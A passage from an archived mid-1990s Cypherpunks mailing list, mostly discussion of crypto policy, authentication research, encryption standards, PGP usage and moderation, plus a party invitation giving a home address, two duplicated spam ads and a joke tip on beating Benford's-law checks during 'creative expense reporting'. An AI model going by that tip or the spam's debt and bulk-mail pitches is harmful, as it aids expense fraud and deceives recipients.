+rJCQH0NS8x3ILT8VT8XtSIuYltBGsQkPagUqYtn3vM/rp3ssPhr/w==
=JFan
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: skaplin@mirage.skypoint.com (Samuel Kaplin)
Date: Mon, 13 Feb 95 21:33:13 PST
To: "James A. Donald" <jamesd@netcom.com>
Subject: Re: EPIC to Debate Exon on CNN
Message-ID: <m0reFsV-0001f7C@skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


>On Mon, 13 Feb 1995, Samuel Kaplin wrote:
>>  A sellout was offered a 
>> la EFF and DT. Mr. Rotenberg seemed ill prepared and not really 
>> interested in the issue.
>
>You expected something different from "EPIC"?
>
>Cypherpunks are supposed to be paranoid.  You are
>not paranoid enough.
>

I don't think paranoia has anything to do with it. I just expect people to
do the job that they are supposed to do. IMHO Mr. Rotenberg didn't do his
job as well as he should have. I saw numerous opportunities to score salient
points and he didn't. What Senator Exon says and what the bill says are two
different things. I got the feeling that Senator Exon didn't even understand
the ramifications of the bill. The unfortunate part is Joe Blow on the
street isn't going to read the bill. He's going to rely on what he has
heard. In my opinion Mr. Rottenberg didn't correct Senator Exon forcefully
enough. The consumate politician triumphed.

Sam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Mon, 13 Feb 95 20:44:56 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: ref on crypto formalism
In-Reply-To: <199502140310.TAA23087@jobe.shell.portal.com>
Message-ID: <199502140446.XAA18306@ducie.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Pierre writes:
> I'm pretty sure I saw somewhere a companion paper titled something
> like "An algebra of authentication"... hmmm  maybe even in CACM...
> [...15 minutes later...] Unfortunately some of my CACMs are in hiding
> and not properly indexed... It was work done at DEC SRC in Palo Alto,
> there must be some research reports too.
> 
> If somebody has refs for any of these, it would be great if you'd
> post them.

http://ftp.digital.com/pub/DEC/SRC/research-reports/abstracts/src-rr-039.html
SRC Research Report 39	A Logic of Authentication
Michael Burrows, Martin Abadi, and Roger Needham
February 28, 1989	48 pages

http://ftp.digital.com/pub/DEC/SRC/research-reports/abstracts/src-rr-070.html
SRC Research Report 70	A Calculus for Access Control in Distributed Systems
M. Abadi, M. Burrows, B. Lampson, G. Plotkin
March 4, 1991	52 pages

http://ftp.digital.com/pub/DEC/SRC/research-reports/abstracts/src-rr-083.html
SRC Research Report 83	Authentication in Distributed Systems: Theory and 
			Practice
Butler Lampson, Martin Abadi, Michael Burrows, Edward Wobber
February 4, 1992

http://ftp.digital.com/pub/DEC/SRC/research-reports/abstracts/src-rr-117.html
SRC Research Report 117	Authentication in the Taos Operating System
Edward Wobber, Martin Abadi, Mike Burrows, and Butler Lampson
December 10, 1993	38 pages




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: M00012@kanga.stcloud.msus.edu
Date: Mon, 13 Feb 95 22:45:28 PST
To: cypherpunks@toad.com
Subject: Cypher_punks standards, again.
Message-ID: <950214004527.42ba@kanga.stcloud.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Cypherpunks,

Q.  What do I mean, standards?

A.  A set of specifications that will allow encryption modules
    to be incorperated into receptacle encryption interface
    programs easily.

    The advantages of programs that comply with the CP standard
    might be illustrated with an example.

    Suppose Alice wants to use an interface program, say,
    GENPGP.EXE, to encrypt a message to Bob.

    Suppose that GENPGP is an interface encryption receptacle
    program that allows users to add and use their own encryption
    modules of choice.  If Alice were a command line freak, she
    could type:

        GENPGP -RSA_encrypt_the_session_key \
        -random_session_key_source ISA_Johnson_Noise_ADC \
        -chainsession \
        -blowfish -rounds 18 -keylength 2048 \
        -idea \
        -3descfb \
        -compress pkzip \
        -plain_text_file topsec.doc
        -receipient bob

    Or, suppose Alice is a GUI freak.  In this case she could
    use her entcrypt_lab schematic interface to design and save
    her encryption scheme for topsec.doc, and simply drop the
    icon for the doc into her block diagram's input icon.

    Bob, in either case, is still able to use his own program
    of choise, GNU_safe_mail, to automatically decrypt Alice's
    message to him, so long as Bob has incorperated all of the
    latest modules availible.

Q.  What are some advantages?

A.  There are numerous advantages.  Some programmers are good at
    writing user interfaces, and others are better at implementing
    algorithms.  Currently, many programmers of the second type
    make all sorts of encryption algorithms available, but these
    are not always easily understood by programmers of the first
    type, and more importantly, coded algorithms are not easily
    incorperated into existing programs.

    Another problem that may arise is that existing programs,
    and programs that may come out in the next year or two,
    may gain widespread use (e.g. PGP.EXE), but may at some
    time in the future become practically worthless, for
    example, if widely used interface programs rely on
    encryption algorithms that are discovered or perceived
    to be weak.

    If a standard such as the one I am proposing is released
    and gains acceptance, more programmers will comply, and
    this will allow the users of their interfaces to painlessly
    adapt the interface programs.  More importantly, such
    interface programs that make use of CP complient
    encryption modules will allow users to encrypt as
    insecurely or securely as their parinoia dictates.

    Also, as new encryption algorithms are invented and coded,
    hackers who like to optimize may take the extra step and
    make their code CP complient.  And command line Alice will
    be able to type:

        GENPGP -add_module BlowFish.mod

Q.  What are the disadvantages?

A.  At first blush, one disadvantage is options, like PGP's -m,
   (for your eyes only) are not practical for a standard such
   as the one I am proposing.  But then again, even using the
   command:

        PGP -em susan.doc

    is little more than a suggestion to the recepient of
    the letter to not keep the plaintext around.

Q.  Why should we?

A.  If we don't, IEEE or some other organization is
    bound to, and IEEE seems to be getting more politically
    correct as the years pass, and this doesn't seem to
    be compatible with the purpose of an encryption module
    standard.

    Consequently, I believe that such a task should be initiated
    and taken to completion by a renegade group such as the
    cypherpunks, by committe if possible, with the hopes that
    government moles will not weaken our effort.

Mike Morgan


-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAgUBMNBuvbwEeVpjJyiBAQEi5QP/T9FmRS2nwWq0lr9iT+cQWMEMV1++Hpf3
u0OWnYYFlRjgJPxTa5vT549tgGeRGV+CB+TI6N3Aj96+LTWb34qS5Y0W2x7R5FEg
+XnACQRs9G5qIK4Zn114KlWXyx7Mj0QQCeo4h86gISdrWkfSJiYkwEoGgzcf6ocF
gp45YZLznnk=
=cMFk
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: viking@pacifier.com (Robert East)
Date: Thu, 9 Nov 1995 15:26:39 +0800
To: cypherpunks@toad.com
Subject: Register
Message-ID: <m0tDQkJ-0008ySC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


Register

I'd like to sign up for email

Bob





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "lstewart" <lstewart@prisminc.com>
Date: Sat, 30 Dec 1995 08:45:21 +0800
To: strata@virtual.com
Subject: Housewarming/birthday party
Message-ID: <9502157953.AA795307204@prisminc.prisminc.com>
MIME-Version: 1.0
Content-Type: text/plain



     You're invited to celebrate
     Laura and Bill's New Home
     Bill's Birthday
     and anything else you'd like to celebrate!
     Date:  Saturday, January 13
     Time:  5:00pm (or whenever)
     Putative location:  2040 Rock Ave. #22, Mountain View, CA
     RSVP (acceptances):  lstewart@prisminc.com, or Laura Stewart at work: 
     408-744-3359. 
      
     What to bring:  If you RSVP by Jan 12, don't bring anything!  We'll 
     provide something resembling dinner.  If you don't RSVP, bring food or 
     drink.  You are welcome to bring your family or other guests, but 
     please do not forward this invitation to other mail lists.  Smoking is 
     prohibited, laptop computers tolerated, board games warmly encouraged.
     
     How to get there (all directions are written as if 101 really went 
     north and south):
                          HOW TO FIND THE APARTMENT
     
     The address is 2040 W. Middlefield #22, but ignore that fact.  It is 
     much easier to find if you firmly believe that the address is 2040 
     Rock Ave. #22.  From the corner of Rock & Rengstorff, follow the big 
     lighted "2040" numbers along Rock.  Just after the second driveway on 
     Rock you will find a walkway into the complex...follow the walkway to 
     #19, then climb the stairs to #22.
     
                 HOW TO FIND THE CORNER OF ROCK & RENGSTORFF
     
     Cypherpunks:  From La Castena (the burrito place), just go one block 
     "west" on Rengstorff.
     
     From Highway 101 southbound:  Take Rengstorff exit, which makes a 
     180-degree loop.  Turn left onto Rengstorff westbound (away from the 
     bay, toward the ocean).   One block after Old Middlefield (and one 
     block before Middlefield), turn left on Rock Ave and park on Rock.  
     See above to find the apartment.
     
     From Highway 101 northbound:  Ignore the Middlefield exit.  Take 
     Rengstorff exit, which makes a 270-degree loop and merges onto 
     Rengstorff westbound (away from the bay, toward the ocean).   One 
     block after Old Middlefield (and one block before Middlefield), turn 
     left on Rock Ave. and park on Rock.  See above to find the apartment.
     
     From 680 at Dunbarton exit:  Taking the Dunbarton bridge to 101 is a 
     few minutes faster, but it's easy to get lost between the bridge and 
     101.  Unless you're familiar with the area, we recommend taking 680 to 
     237, west on 237 to 101, and north on 101 to the Rengstorff exit, 
     which makes a 270-degree loop and merges onto Rengstorff westbound 
     (away from the bay, toward the ocean).   One block after Old 
     Middlefield (and one block before Middlefield), turn left on Rock Ave. 
     and park on Rock.  See above to find the apartment.
     
     Further complications..er, clarifications:  Rock Ave. and Rock St. are 
     the same thing.  Middlefield Road and Old Middlefield Road are two 
     different things.
     
                   Middlefield  Rock       Old Middlefield    101
       ^             |          |           |                 |  
       |             |          |           |                 |  
     "North"         |          |           |                 |        the
                     |          |           |                 |        bay
     Rengstorff-----------------------------------------------------
                     |  _______ |           |                 |  
                     | [    2  ]|           |La               |  
                     | [    0  ]|           |Castena          |  
                     | [    4  ]|           |                 |  
                     | [    0  ]|           |                 |  
                     | [_______]|           |                 |  
                     |      #22 |           |                 |             
                     |          |           |                 |  
                     |          |           |                 |  
     
     
     
     
     Lost on the day of the party?  Call us at home: 415-938-1697.
     
     The price of condo living: There is no guest parking in the complex, 
     and the party must end by 10pm.  Please help us get along with our new 
     neighbors by respecting the condo rules.  Thanks!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Peng-chiew Low <pclow@pc.jaring.my>
Date: Sun, 10 Mar 1996 01:36:22 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: S/MIME outside the US?
In-Reply-To: <199602290845.AAA03948@ix4.ix.netcom.com>
Message-ID: <2F550373.CEA@pc.jaring.my>
MIME-Version: 1.0
Content-Type: text/plain


Bill Stewart wrote:
> 
> At 10:49 PM 2/24/96 -0500, Lewis  wrote:
> I'm assuming from volley's address that he or she is in Sweden,
> and thus not directly limited by US export laws.  Write what you want,
> and post it somewhere outside the US; we can import it legally.
> As a non-American, you probably couldn't get US export permission for
> even 40-bit RC4, and maybe not even for rot13.

	Lurk Mode Off.......
	
	I don't suppose there's anyone out there who may be 
	interested in working with an non-american InfoSec
	integrator in integrating encryption with email
	/messaging and other applications? 

	I assume that there is a legal difference between 
	"working with" and "developing for" AFA ITAR is 
	concerned.

	Thanks........Lurk Mode On.......




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: max.muzi@altair.it (Max Muzi)
Date: Sat, 9 Mar 1996 04:49:25 +0800
To: cypherpunks@toad.com
Subject: question re. PGP CharSet
Message-ID: <96030819291115648@altair.it>
MIME-Version: 1.0
Content-Type: text/plain



Apparently, the mechanism for overriding PGP configuration settings by
means of command-line arguments  does not work properly with the
option "charset" (at least with version 2.6.1i). Anyone know why?
Actually, PGP does understand the option "+charset", as it does not
yield an "invalid argument" error message, but it looks like it does
not take that option into consideration.

While I know most people need not switch from one charset to another
every day, some of them (like me) do not have completely migrated to
Windows yet and would still like to use the MS-DOS standard charset
(cp850) from time to time without having to re-edit or substituting
the PGP config file each time. But I guess it's not possible, is it?

Thanks,

Max

PS: [off-topic] Anybody know how one can have the MS-DOS keyboard
driver use the standard Windows char table (LATIN1 aka iso-8859-1)?

~~
Massimiliano Muzi ['mu:tsi] <max.muzi@altair.it>
http://www.geocities.com/Athens/2027/max-muzi.html
PGP public key available on keyservers.
"Eternal nothingness is OK if you are dressed for it"

msg date/time: Friday 8 March 1996, 12:38 GMT+1









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Leonardo Machado <diarioam@ronet.com.br>
Date: Tue, 19 Mar 1996 23:32:52 +0800
To: cypherpunks@toad.com
Subject: DESCRIBE
Message-ID: <2F6BBFDA.5DF7@ronet.com.br>
MIME-Version: 1.0
Content-Type: text/plain


undescribe cypherpunks@toad.com cyber@ronet.com.br




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eriksmit <eriksmit@euronet.nl>
Date: Tue, 16 Apr 1996 06:26:21 +0800
To: Clay Olbon II <olbon@dynetics.com>
Subject: Re: [NOISE] Consolidation of threads ...
In-Reply-To: <v01540b0cad96f6491958@[193.239.225.200]>
Message-ID: <2F902565.27A6@euronet.nl>
MIME-Version: 1.0
Content-Type: text/plain


Clay Olbon II wrote:
> 
> OK, I have a proposal that consolidates two threads that have been
> discussed recently.  How about proposing legislation that mandates that a
> byte is now 9 bits instead of 8.  This would allow the ninth bit to be the
> decent/indecent bit, thereby solving all of our problems.
> 
>         Clay
> 
> ---------------------------------------------------------------------------
> Clay Olbon II            | Clay.Olbon@dynetics.com
> Systems Engineer         | ph: (810) 589-9930 fax 9934
> Dynetics, Inc., Ste 302  | http://www.msen.com/~olbon/olbon.html
> 550 Stephenson Hwy       | PGP262 public key: on web page
> Troy, MI 48083-1109      | pgp print: B97397AD50233C77523FD058BD1BB7C0
>                      TANSTAAFL
> ---------------------------------------------------------------------------

Get me off from the list




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nwosuck@harpo.wh.att.com (Kingsley Nwosu)
Date: Thu, 11 May 95 17:35:05 -0500
To: Multiple recipients of list <dbworld@cs.wisc.edu>
Subject: (DBWORLD) Massive Digital  Data Systems
Message-ID: <bdcb7bc60b8f75ebbacc7f98f7afa8aa@NO-ID-FOUND.mhonarc.org>
MIME-Version: 1.0
Content-Type: text/plain


Birds of a Feather Session on the
Intelligence Community Initiative in
Massive Digital  Data Systems

To be held in Conjunction with the 1995 ACM  SIGMOD International Conference on 
Management of Data

in the Crystal Room at The Fairmont Hotel, San Jose, California
on Tuesday, 23 May 1995 from 7 pm to 9 pm

*******************************

Massive Digital Data Systems (MDDS) will require effective management,
retrieval, and integration of databases that may be heterogeneous.  Achieving
this concept of massive intelligence information systems will require new
technologies and novel approaches for data management.  While several advances
have been made in database management technology, the complexity and the size
of the database coupled with the unique needs of the Intelligence Community
(IC) require the development of novel approaches.  The MDDS Initiative has
been started by the  Community Management Staff (CMS) of the IC to identify
the data management issues and challenges as well as to develop possible
solutions for  managing massive databases.,

The purpose of the Birds of a Feather Session is to provide an overview of the
MDDS program, solicit input toward developing a testbed /framework for the 
initiative, and to have  technical discussions  on novel methods for managing
massive databases.  Tentative agenda for the  session is as follows:

1. Overview of MDDS  Initiative 
2. Overview of MDDS  Research Projects 
3.  Discussion on testbed/framework 
4.  Discussion on techniques for massive database management 

Information on the MDDS Initiative can be obtained from : 
http://www.nml.org/other_programs/mdds/mdds.html

For more information contact:
Dr. Bhavani Thuraisingham
K329, The MITRE Corporation, Burlington Road, Bedford, MA 01730
email: thura@mitre.org; Phone: 617-271-8873; Fax: 617-271-2352 







-------------------------------------------------------------------------------
The dbworld alias reaches many people, and should only be used for
messages of general interest to the database community. 

Requests to get on or off dbworld should go to listproc@cs.wisc.edu.

  to subscribe send 
	subscribe dbworld Your Full Name

  to unsubscribe send
	unsubscribe dbworld

  to change your address
	send an unsubscribe request from the old address
	send a subscribe request from the new address

  to find out more options send 
	help
------------------------------------------------------------------------FOOTER-







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bhavani Thuraisingham" <Bhavani_Thuraisingham@qmgateib.mitre.org>
Date: Tue, 16 May 95 18:51:40 -0500
To: Multiple recipients of list <dbworld@cs.wisc.edu>
Subject: (DBWORLD) MDDS Session Time Change
Message-ID: <3e7ba8f1fcfb5078b6cb77ea1ae5fb8c@NO-ID-FOUND.mhonarc.org>
MIME-Version: 1.0
Content-Type: text/plain


                                           5/15/95            5:17 PM
                                           MDDS Session Time Change

Birds of a Feather Session on the
Intelligence Community Initiative in
Massive Digital  Data Systems

Held in Conjunction with the 1995 ACM  SIGMOD International Conference on 
Management of Data

in the Crystal Room at The Fairmont Hotel, San Jose, California
on Tuesday, 23 May 1995 from 7:30 pm to 9:30 pm

*******************************

Massive Digital Data Systems (MDDS) will require effective management,
retrieval, and integration of databases that may be heterogeneous.  Achieving
this concept of massive intelligence information systems will require new
technologies and novel approaches for data management.  While several advances
have been made in database management technology, the complexity and the size
of the database coupled with the unique needs of the Intelligence Community
(IC) require the development of novel approaches.  The MDDS Initiative has
been started by the  Community Management Staff (CMS) of the IC to identify
the data management issues and challenges as well as to develop possible
solutions for  managing massive databases.,

The purpose of the Birds of a Feather Session is to provide an overview of the
MDDS program, solicit input toward developing a testbed /framework for the 
initiative, and to have  technical discussions  on novel methods for managing
massive databases.  Tentative agenda for the  session is as follows:

1. Overview of MDDS  Initiative 
2. Overview of MDDS  Research Projects 
3.  Discussion on testbed/framework 
4.  Discussion on techniques for massive database management 

Information on the MDDS Initiative can be obtained from : 
http://www.nml.org/other_programs/mdds/mdds.html

For more information contact:
Dr. Bhavani Thuraisingham
K329, The MITRE Corporation, Burlington Road, Bedford, MA 01730
email: thura@mitre.org; Phone: 617-271-8873; Fax: 617-271-2352 



-------------------------------------------------------------------------------
The dbworld alias reaches many people, and should only be used for
messages of general interest to the database community. 

Requests to get on or off dbworld should go to listproc@cs.wisc.edu.

  to subscribe send 
	subscribe dbworld Your Full Name

  to unsubscribe send
	unsubscribe dbworld

  to change your address
	send an unsubscribe request from the old address
	send a subscribe request from the new address

  to find out more options send 
	help
------------------------------------------------------------------------FOOTER-




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 68864320@canma.dyn.ml.org
Date: Fri, 25 Jul 1997 13:15:31 -0700 (PDT)
To: mail@you.com
Subject: Important Financial Information...
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


>>> PAY OFF ALL YOUR BILLS! <<<

Including your mortgage in 3-7 years...
Using your current income!

People have become slaves to their debts.
It's a never ending circle of go to work - pay the
bills - go to work...

>>> NOW THERE IS A WAY OUT! <<<

A proven system used by more than 150,000
people in the USA and Canada.

Find Out How - With Our FREE Information

You have nothing to lose (except your debts) by
requesting the FREE information!

For immediate  FREE  information, send any message to
freeinfo6@answerme.com, and our automatic response
E-mail address will send you a FREE report within minutes.

Get started on your debt-free journey today.

Also, you'll learn how you can... JOIN OUR TEAM & EARN A
FANTASTIC RESIDUAL INCOME!

**********************************************************************
If you would like to learn about advertising your own product or
service on the internet then please visit this Web site:

http://www.amv-inc.com

**********************************************************************

If you wish to be removed from this mailing list, please write us at:
remove@alderney.dyn.ml.org
Thank you.

**************************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 05551984@turboma.dyn.ml.org
Date: Sun, 27 Jul 1997 17:12:43 -0700 (PDT)
To: mailee@morenet.net
Subject: About your online business.
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


---> Do you run an online BUSINESS?
---> Are you interested in electronic MARKETING?
---> Do you want to dramatically INCREASE your SALES?

Keep reading... we will explain you how your business can take
advantage of bulk e-mail's incredible power!

Dear fellow online entrepreneur,

     If you're like me, you're certainly very enthusiast about
the Internet's possibilities. However, we all know that the
biggest challenge is to give our sales material a decent
visibility. With all those competitors around, you must take
action to reach out for customers, to directly reach your
potential buyer.

     You probably already tried dozens of different ways to
promote your online business... Search Engines are now overloaded
and unlikely to bring much business... Online Malls are expensive
and they often won't bring you sales... Newsgroups promotion is
now out of question.

     You need a media that directly reaches out for the customer.
You need to use bulk e-mail. Imagine... your sales pitch sent to
thousands of potential buyers. It's almost like a virtual flyer
distribution.

     And the best part is that you won't have to spend much to
take advantage of this incredible marketing tool. Here's a
glimpse at our prices:
- 100,000 mailings:  only $69.95
- 1,000,000 mailings:  only $249.95

To get full details and contact information, just write any
message to our automatic autoresponder: siminfo@answerme.com
Again, all you have to do is to send us any e-mail at
siminfo@answerme.com
You will then receive all information via e-mail within minutes.

Bulk E-Mail will turbocharge your business.
Don't delay. Act now!

Yours trully,

Pierre Roussil - SIM Inc.

PS: Request the information NOW to take advantage of our HOT      
    limited time offer!

*****************************************************************
If you wish to be removed from our mailing list, please write us
at simrem@answerme.com . You will receive a removal confirmation
via e-mail. Thank you.
*****************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 68864320@canma.dyn.ml.org
Date: Fri, 25 Jul 1997 13:15:31 -0700 (PDT)
To: mail@you.com
Subject: Important Financial Information...
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


>>> PAY OFF ALL YOUR BILLS! <<<

Including your mortgage in 3-7 years...
Using your current income!

People have become slaves to their debts.
It's a never ending circle of go to work - pay the
bills - go to work...

>>> NOW THERE IS A WAY OUT! <<<

A proven system used by more than 150,000
people in the USA and Canada.

Find Out How - With Our FREE Information

You have nothing to lose (except your debts) by
requesting the FREE information!

For immediate  FREE  information, send any message to
freeinfo6@answerme.com, and our automatic response
E-mail address will send you a FREE report within minutes.

Get started on your debt-free journey today.

Also, you'll learn how you can... JOIN OUR TEAM & EARN A
FANTASTIC RESIDUAL INCOME!

**********************************************************************
If you would like to learn about advertising your own product or
service on the internet then please visit this Web site:

http://www.amv-inc.com

**********************************************************************

If you wish to be removed from this mailing list, please write us at:
remove@alderney.dyn.ml.org
Thank you.

**************************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 05551984@turboma.dyn.ml.org
Date: Sun, 27 Jul 1997 17:12:43 -0700 (PDT)
To: mailee@morenet.net
Subject: About your online business.
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


---> Do you run an online BUSINESS?
---> Are you interested in electronic MARKETING?
---> Do you want to dramatically INCREASE your SALES?

Keep reading... we will explain you how your business can take
advantage of bulk e-mail's incredible power!

Dear fellow online entrepreneur,

     If you're like me, you're certainly very enthusiast about
the Internet's possibilities. However, we all know that the
biggest challenge is to give our sales material a decent
visibility. With all those competitors around, you must take
action to reach out for customers, to directly reach your
potential buyer.

     You probably already tried dozens of different ways to
promote your online business... Search Engines are now overloaded
and unlikely to bring much business... Online Malls are expensive
and they often won't bring you sales... Newsgroups promotion is
now out of question.

     You need a media that directly reaches out for the customer.
You need to use bulk e-mail. Imagine... your sales pitch sent to
thousands of potential buyers. It's almost like a virtual flyer
distribution.

     And the best part is that you won't have to spend much to
take advantage of this incredible marketing tool. Here's a
glimpse at our prices:
- 100,000 mailings:  only $69.95
- 1,000,000 mailings:  only $249.95

To get full details and contact information, just write any
message to our automatic autoresponder: siminfo@answerme.com
Again, all you have to do is to send us any e-mail at
siminfo@answerme.com
You will then receive all information via e-mail within minutes.

Bulk E-Mail will turbocharge your business.
Don't delay. Act now!

Yours trully,

Pierre Roussil - SIM Inc.

PS: Request the information NOW to take advantage of our HOT      
    limited time offer!

*****************************************************************
If you wish to be removed from our mailing list, please write us
at simrem@answerme.com . You will receive a removal confirmation
via e-mail. Thank you.
*****************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mother Jones HTTP Daemon <http@mojones.mojones.com>
Date: Wed, 12 Jul 95 11:22:09 PDT
To: Cypherpunks Lite <cp-lite@comsec.com>
Subject: Your Beta Signup Confirmation
Message-ID: <199507121804.LAA18120@comsec.com>
MIME-Version: 1.0
Content-Type: text/plain


You're now a confirmed MoJo Wire Beta Tester
Username: cypherpunks
Password: cypherpunks
For now, look at <http://www.mojones.com:8040/>

Thanks for participating!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roger@coelacanth.com (Roger Williams)
Date: Wed, 12 Jul 95 19:14:13 PDT
Subject: Re: Is there a moderator in your future?
In-Reply-To: <9507102137.AA26662@spirit.aud.alcatel.com>
Message-ID: <rogerwxdprf5j.fsf@sturgeon.coelacanth.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <9507102137.AA26662@spirit.aud.alcatel.com> droelke@spirit.aud.alcatel.com (Daniel R. Oelke) writes:

   > Why is Dyson of EFF enthusiastic about the concept?

   Because as moderators add value to the vast amount of stuff
   out there.  Why do some people pay to get a restricted subset
   of the cypherpunks?  Because they don't want the massive flow
   of wide open communications and they *trust* the person
   giving them the subset.  

   Moderators provide a great service, and it is finially being
   recognized as such in a monetary way.  I think that this 
   is a great thing!

I agree that moderated groups are useful at keeping the SNR high, and
are a great choice for those who can't or haven't time to set up their
own filters. However, they can't solve the problems that the Internet
is popularly supposed to have (e.g. no provisions for eliminating
parental responsibility).  Even supposing that US ISPs are *prohibited
by law* from carrying unmoderated Usenet groups, how does this address
all of the other services (current and future) that can be carried by
the Internet?  Sorry, the horse is out of the stable, and the only 99%
control option open to the government now is cutting the phone lines
at the border.

If an individual (e.g. a parent) wants to limit net access for certain
services to emasculated resources, perhaps Microsoft Restrict (TM) and
Prodigy can provide a desired service.  Otherwise, the solution to the
problem has to lie closer to home.

-- 
Roger Williams  --  Coelacanth Engineering  --  Middleborough, Mass

#!/usr/local/bin/perl -s-- -export-a-crypto-system-sig -RSA-in-3-lines-PERL
($k,$n)=@ARGV;$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%
Sa2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print pack('H*'
,$_)while read(STDIN,$m,($w=2*$d-1+length($n||die"$0 [-d] k n\n")&~1)/2)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@nately.UCSD.EDU (Lance Cottrell)
Date: Tue, 11 Jul 95 11:40:01 PDT
To: perry@jpunix.com
Subject: Obscura down for a few days.
Message-ID: <9507111839.AA12751@nately.UCSD.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Obscura is suffering from HD troubles. The backups have failed so I am going to have to
rebuild it from scratch. This means that the web page and remailer will be down.
All mail to the remailers will be lost. I have changed the name server so
I will still get mail sent to loki@obscura.com.

	-Lance


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMALFV1Vkk3dax7hlAQHPvAP6A7IWAczKJ3eimrWUgh0F5DMEr7oSpAXg
lJJCC2VV4g9lIDD8C2wob1L6sEZwlDnUt6dMpbKBiT3aksSmBqnvMpe/BlaTd2zk
ZRGCYHUZkx3aOSp9iZevRhjI0HEdm+g2+PwjJcMyPn5EUmz5vnPI9exOt9VGyJV1
eSCCC3Ngz9k=
=ahD6
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Tue, 11 Jul 95 11:52:02 PDT
To: cypherpunks@toad.com
Subject: Moby ints [Re: Num Rat]
In-Reply-To: <199507111749.KAA03281@ionia.engr.sgi.com>
Message-ID: <199507111851.LAA18222@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> pjm@ionia.engr.sgi.com (Patrick May) writes:
> This invocation of the name of the diety reminds me of a question
> I've been meaning to ask.  Is Knuth still a good source of algorithms
> for implementing large integers or do more recent books exist that
> contain superior methods?

While Knuth is now and forever the algorithm deity in general, Arjen
Lenstra is as close to godhood as one can get in moby ints these days.

I'd look at the Lip package Lenstra wrote; it's used in his state of the
art factoring programs.  It's available with masses of PostScript
documentation from ftp.ox.ac.uk.  Studying the code and docs might remind
you of some issues that aren't obvious... and, of course, you might decide
you don't need to write a moby int package, but could just use his library.

	Jim Gillogly
	Hevensday, 18 Afterlithe S.R. 1995, 18:48




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hardin@cyberspace.com
Date: Tue, 11 Jul 95 11:16:17 PDT
To: cypherpunks@toad.com
Subject: Re: Num Rat
Message-ID: <9507111813.AA0253@localhost>
MIME-Version: 1.0
Content-Type: text/plain



John Young posted:

>    He's Got Their Number: Scholar Uses Math to Foil Financial
>    Fraud
> 
>    By Lee Berton
>    Mark Negrini, an assistant professor of accounting at St.
>    Mary's University in Halifax, is trapping tax cheats, check
>    forgers and embezzlers with an obscure theory known as
>    Benford's Law. Formulated by physicist Frank Benford in
>    1938, the law lays out the statistical frequency with which
>    the numbers 1 through 9 appear in any set of random
>    numbers.
> 
>    Mr. Negrini applies the law to the numbers on suspicious
>    checks or tax returns. A series of legitimate check amounts
>    or tax write-offs will be genuinely random, while those
>    dreamed up by a human will not. If the numbers on the
>    checks or tax returns do not obey Benford's Law, they can't
>    be random, and "someone is taking the company to the
>    cleaners," Mr. Negrini says.

I just looked @ the front of a M.O. computer catalog & the numerals in the
prices are anything but random. A very heavy concentration of eights (8) &
nines (9), apparently this company is more into $508.98 (color inkjet printer)
& $38.98 (well known game s/w) than the old late night TV standby of
"JUST $19.99!". Of course, this is because of excessively documented
ad nauseum human psychological tendencies that salescritters, who set at
least the lsd's of price, have been aware of for millenia. I'd bet, that
5(five), 8(eight), & 9(nine) are significantly more represented across
the board in prices (& thus in amounts for checks & tax write offs) than
than their random distribution by Benford's Law or more well known tests
for randomness would suggest. Has Mr. Negrini factored this into his program?
I guess the lesson is do a few pgp make__random's & convert a few of the
hex numbers to dec digits for the lsd's the next time one does creative expense
reporting.

tjh




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zinc <zinc@zifi.genetics.utah.edu>
Date: Tue, 11 Jul 95 12:22:22 PDT
To: hardin@cyberspace.com
Subject: Re: Num Rat
In-Reply-To: <9507111813.AA0253@localhost>
Message-ID: <Pine.LNX.3.91.950711131925.3058D-100000@zifi.genetics.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain


